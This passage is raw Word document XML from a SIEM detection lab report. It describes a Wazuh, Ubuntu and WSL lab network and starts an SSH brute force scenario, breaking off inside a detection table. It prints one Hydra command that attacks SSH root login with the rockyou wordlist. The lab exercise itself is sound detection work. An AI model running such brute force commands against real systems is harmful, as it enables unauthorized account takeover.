              <w:t>ThreatScope</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> custom engine</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="78930B8C" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2592" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="C0D0E0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E8EEF4"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6F7F1589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3A5C"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>MITRE Mapping</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7128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8" w:space="0" w:color="C0D0E0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="796A2825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Map all detected activity to ATT&amp;CK tactics and techniques</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="0F7BF9B0" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2592" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="C0D0E0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E8EEF4"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3C2F00A8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3A5C"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Threat Intel Export</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7128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8" w:space="0" w:color="C0D0E0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F5F8FB"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7238FE2D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Generate STIX 2.1 bundles and JSON IOC reports</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="61B1E0BC" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2592" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="C0D0E0"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="C0D0E0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E8EEF4"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="222699CC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3A5C"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Incident Response</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7128" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="C0D0E0"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="C0D0E0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3DE6FE2D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Document findings and remediation steps per scenario</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="000764B7" w14:textId="77777777" w:rsidR="00BA2BC0" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AF80D8" w14:textId="77777777" w:rsidR="00BA2BC0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="6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80AB2BD" wp14:editId="7F3B2C9E">
                <wp:extent cx="6172200" cy="350671"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="12627" name="Group 12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350671"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="6172200" cy="350671"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="102" name="Shape 102"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="6172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 h="330200">
                                <a:moveTo>
                                  <a:pt x="50800" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="6121400" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6149482" y="0"/>
                                  <a:pt x="6172200" y="22718"/>
                                  <a:pt x="6172200" y="50800"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="6172200" y="279400"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6172200" y="307482"/>
                                  <a:pt x="6149482" y="330200"/>
                                  <a:pt x="6121400" y="3302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22718" y="330200"/>
                                  <a:pt x="0" y="307482"/>
                                  <a:pt x="0" y="279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20471"/>
                            <a:ext cx="6172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 h="330200">
                                <a:moveTo>
                                  <a:pt x="50800" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="6121400" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6149482" y="0"/>
                                  <a:pt x="6172200" y="22718"/>
                                  <a:pt x="6172200" y="50800"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="6172200" y="279400"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6172200" y="307482"/>
                                  <a:pt x="6149482" y="330200"/>
                                  <a:pt x="6121400" y="3302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22718" y="330200"/>
                                  <a:pt x="0" y="307482"/>
                                  <a:pt x="0" y="279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A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0" name="Rectangle 10150"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="170791" y="86020"/>
                            <a:ext cx="88711" cy="264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4CD4F" w14:textId="77777777" w:rsidR="00BA2BC0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4" name="Rectangle 10154"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="259502" y="77285"/>
                            <a:ext cx="2815392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5ED81" w14:textId="77777777" w:rsidR="00BA2BC0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. LAB ENVIRONMENT SETUP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0AB2BD" id="Group 12627" o:spid="_x0000_s1034" style="width:486pt;height:27.6pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="61722,3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">
                <v:shape id="Shape 102" o:spid="_x0000_s1035" style="position:absolute;width:61722;height:3302;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="61722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" path="m50800,l6121400,v28082,,50800,22718,50800,50800l6172200,279400v,28082,-22718,50800,-50800,50800l50800,330200c22718,330200,,307482,,279400l,50800c,22718,22718,,50800,xe" fillcolor="#1a3a5c" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,6172200,330200"/>
                </v:shape>
                <v:shape id="Shape 103" o:spid="_x0000_s1036" style="position:absolute;top:204;width:61722;height:3302;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="61722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" path="m50800,l6121400,v28082,,50800,22718,50800,50800l6172200,279400v,28082,-22718,50800,-50800,50800l50800,330200c22718,330200,,307482,,279400l,50800c,22718,22718,,50800,xe" fillcolor="#1a3a5c" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,6172200,330200"/>
                </v:shape>
                <v:rect id="Rectangle 10150" o:spid="_x0000_s1037" style="position:absolute;left:1707;top:860;width:888;height:2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" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="5674CD4F" w14:textId="77777777" w:rsidR="00BA2BC0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10154" o:spid="_x0000_s1038" style="position:absolute;left:2595;top:772;width:2815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J6uxQAAAN4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" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="2DC5ED81" w14:textId="77777777" w:rsidR="00BA2BC0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. LAB ENVIRONMENT SETUP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5EEB970" w14:textId="77777777" w:rsidR="00BA2BC0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="65"/>
        <w:ind w:left="-5" w:right="-15"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The lab environment consists of three virtual machines running on VirtualBox and VMware Workstation, all connected on the same bridged network segment (192.168.1.0/24). </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ThreatScope</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> runs natively on the Windows host machine.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9720" w:type="dxa"/>
        <w:tblInd w:w="6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6"/>
        <w:gridCol w:w="2880"/>
        <w:gridCol w:w="2016"/>
        <w:gridCol w:w="2808"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="73BFA2E4" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2016" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="C0D0E0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="C0D0E0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1A3A5C"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="324CAC12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880" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="C0D0E0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1A3A5C"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4271F2B9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  <w:tc>
          <w:tcPr>
            <w:tcW w:w="2016" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="C0D0E0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1A3A5C"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="28798849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IP Address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2808" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="C0D0E0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="C0D0E0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1A3A5C"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="596E33A2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 w:rsidR="00BA2BC0" w14:paraId="1D461644" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2016" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="C0D0E0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="19D90B41" w14:textId="77777777" w:rsidR="00BA2BC0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8"/>
              </w:rPr>
              <w:t>Wazuh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> SIEM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880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4" w:space="0" w:color="DDE8F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="36916AFF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OVA v4.14.4 / VirtualBox</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2016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4" w:space="0" w:color="DDE8F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="03C27CD3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192.168.1.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2808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8" w:space="0" w:color="C0D0E0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="573B695E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SIEM Manager + Dashboard</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="3E6A8082" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2016" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="C0D0E0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F5F8FB"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="24D0DD63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Ubuntu Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880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4" w:space="0" w:color="DDE8F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F5F8FB"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7BC9D8A8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Ubuntu 24.04 LTS / VMware</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2016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4" w:space="0" w:color="DDE8F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F5F8FB"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="09899FFE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192.168.1.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2808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8" w:space="0" w:color="C0D0E0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F5F8FB"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7FCB8998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Victim Endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="4B03B6DD" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2016" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="C0D0E0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="16D0D179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Windows Host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880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4" w:space="0" w:color="DDE8F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6400C50E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Windows 10/11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2016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4" w:space="0" w:color="DDE8F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0C948979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192.168.1.7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2808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8" w:space="0" w:color="C0D0E0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="396AA333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 xml:space="preserve">Attacker + </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ThreatScope</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="54DD1F28" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2016" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="C0D0E0"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="C0D0E0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F5F8FB"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="688B263B" w14:textId="2D67A1B3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WSL (</w:t>
            </w:r>
            <w:r w:rsidR="007F7D8E">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ubuntu</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="C0D0E0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F5F8FB"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3D469F7E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Debian-based WSL2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2016" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="C0D0E0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F5F8FB"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="59617A7D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172.</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>20.144.x</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2808" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="C0D0E0"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="C0D0E0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F5F8FB"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0BA505D3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Attack Tools (Hydra)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="42012184" w14:textId="4E8E199B" w:rsidR="00BA2BC0" w:rsidRDefault="00000000" w:rsidP="007F7D8E">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="8" w:space="0" w:color="1A6B3C"/>
          <w:left w:val="single" w:sz="32" w:space="0" w:color="1A6B3C"/>
          <w:bottom w:val="single" w:sz="8" w:space="0" w:color="1A6B3C"/>
          <w:right w:val="single" w:sz="8" w:space="0" w:color="1A6B3C"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8F5E9"/>
        <w:spacing w:after="307" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="295"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1A6B3C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">[ </w:t>
      </w:r>
      <w:r w:rsidR="007F7D8E" w:rsidRPr="007F7D8E">
        <w:rPr>
          <w:b/>
          <w:color w:val="1A6B3C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C792F24" wp14:editId="1187DDB4">
            <wp:extent cx="6248400" cy="3275965"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="4673180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1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9294" w14:textId="77777777" w:rsidR="00BA2BC0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="334" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="-15"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wazuh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Agent was installed on Ubuntu Server and successfully connected to the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wazuh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Manager. The agent (ID: 001, Name: 0xsabry) was verified as Active in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wazuh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Endpoints dashboard prior to executing any attack scenarios.</w:t>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="13571880" w14:textId="77777777" w:rsidR="00BA2BC0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:after="360"/>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>3. SCENARIO 1 — SSH BRUTE FORCE ATTACK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F53AD16" w14:textId="77777777" w:rsidR="00BA2BC0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>3.1 Attack Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1823DC84" w14:textId="77777777" w:rsidR="00BA2BC0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="334" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="-15"/>
      </w:pPr>
      <w:r>
        <w:t>A dictionary-based SSH brute force attack was launched from the WSL environment against the Ubuntu Server endpoint using Hydra v9.5. The attack targeted the root account using the rockyou.txt wordlist with 4 parallel threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CF7E48" w14:textId="77777777" w:rsidR="00BA2BC0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="136"/>
        <w:ind w:left="235"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Command executed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2C7130" w14:textId="77777777" w:rsidR="00BA2BC0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8F8F8"/>
        <w:spacing w:after="219"/>
        <w:ind w:left="315"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>hydra -l root -P /root/rockyou.txt ssh://192.168.1.9 -t 4 -V</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFF20E6" w14:textId="77777777" w:rsidR="00BA2BC0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.2 Detection — </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wazuh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> SIEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329DBE98" w14:textId="77777777" w:rsidR="00BA2BC0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="-5" w:right="-15"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wazuh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> detected the brute force activity in real time through the agent running on the victim endpoint. A total of 339 security events were generated within minutes of the attack commencing.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="8784" w:type="dxa"/>
        <w:tblInd w:w="528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52"/>
        <w:gridCol w:w="4608"/>
        <w:gridCol w:w="1584"/>
        <w:gridCol w:w="1440"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="2FAB68F1" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1152" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="E0B0B0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="E0B0B0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="F0D0D0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="F0D0D0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="7B1A1A"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="68A5990B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w="4608" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="E0B0B0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="F0D0D0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="F0D0D0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="F0D0D0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="7B1A1A"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
